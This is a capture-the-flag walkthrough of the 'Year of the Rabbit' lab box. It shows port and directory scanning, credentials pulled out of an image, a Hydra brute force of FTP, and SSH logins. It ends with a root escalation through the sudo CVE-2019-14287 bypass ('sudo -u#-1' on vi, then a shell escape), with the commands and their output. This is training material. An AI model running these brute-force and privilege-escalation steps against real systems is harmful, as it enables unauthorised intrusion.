🐇Year of the Rabbit

Time to enter the warren...

1.Reconnaisance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -sC -sV 10.10.243.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 20:54 IST
Nmap scan report for 10.10.243.87
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.83 seconds

We find open port 21, 22, and 80 running ftp ,ssh and http server respectively
Webpage is a default Apache landing page

2. Scanning

2.1 Gobuster

Directory brute forcing using gobuster on port 80

gobuster dir -u http://10.10.243.87 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.243.87
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/17 20:56:10 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.243.87/assets/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2022/07/17 21:01:54 Finished
===============================================================

Going over to /assets, we find

Viewing style.css, we get another endpoint /sup3r_s3cr3t_fl4g.php

Going over, it pops up a warning to tun off the JavaScript and redirects us to a YouTube video of 'Rick Roll'

Capturing this request in burp,

We get an intermediary path /WExYY2Cv-qU
Going over to that path, while forwarding the request one at a time, we get an image Hot_Babe.png

Downlaoding the image

wget http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png             5m 44s
--2022-07-17 21:11:13--  http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png
Connecting to 10.10.243.87:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 475075 (464K) [image/png]
Saving to: ‘Hot_Babe.png’

Hot_Babe.png.1              100%[===========================================>] 463.94K   202KB/s    in 2.3s    

2022-07-17 21:11:16 (202 KB/s) - ‘Hot_Babe.png’ saved [475075/475075]

Using strings on the image, we get an FTP password list for the user ftpuser

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
===========================================================

Saving these to pass.txt

2.2 Hydra

Using hydra to brute force ftp password

hydra -l ftpuser -P pass.txt ftp://10.10.243.87

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-17 21:15:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.243.87:21/
[21][ftp] host: 10.10.243.87   login: ftpuser   password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-17 21:15:19

We get the credentials
ftpuser : 5iez1wGXKfPKQ
Login in via FTP, we get a text file Eli's_Creds.txt

ftp 10.10.243.87                                                  
Connected to 10.10.243.87.
220 (vsFTPd 3.0.2)
Name (10.10.243.87:joseph): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.

ftp> get Eli's_Creds.txt 
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
226 Transfer complete.
758 bytes received in 0.00 secs (3.8248 MB/s)

In that file, we find some weird encoded text

+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <

Not your typical encoding. This is in fact a programming language called brainfuck and you can decode it here
It gives us the credentials
eli : DSpDiM1wAEwid

3. Gaining access

SSHing as Eli, we find a message in the headers

ssh eli@10.10.243.87
The authenticity of host '10.10.243.87 (10.10.243.87)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.243.87' (ECDSA) to the list of known hosts.
eli@10.10.243.87's password: 


1 new message
Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE

It talks about a secret hiding place, with the secret spelled in leet code.
Searching for s3cr3t, we find a directory .usr/gamnes/s3cr3t

eli@year-of-the-rabbit:~$ find / -name s3cr3t 2>/dev/null
/usr/games/s3cr3t

It has a hidden file .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!. Reading it

Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root

We get the credentials
Gwendoline : MniVCQVhQHUNI
Switching user as gwendoline, we find user.txt in her home folder

eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password: 
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ cd /home/
gwendoline@year-of-the-rabbit:/home$ ls
eli  gwendoline
gwendoline@year-of-the-rabbit:/home$ cd gwendoline/
gwendoline@year-of-the-rabbit:~$ ls
user.txt

4. Privilege Escalation

4.1 CVE-2019-14287

When using sudo -l, we get

wendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

There is a !root specified, which means gwendoline can run /usr/bin/vi as any user but the root user
Viewing the sudo version we find that it is 1.8.10

sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

This version is vulnerable to CVE-2019-14287 and it can be exploited to run as root by prepending sudo -u#-1 to the path of the command that can be run by the user, i.e. sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt. Read more about it here
This opens vi as root, and we can spawn as bash shell by typing :!/bin/sh

Reading the root.txt flag

whoami
root

cd /root 

ls
root.txt

cat root.txt

PreviousRootMe NextVulnhub

Last updated 3 years ago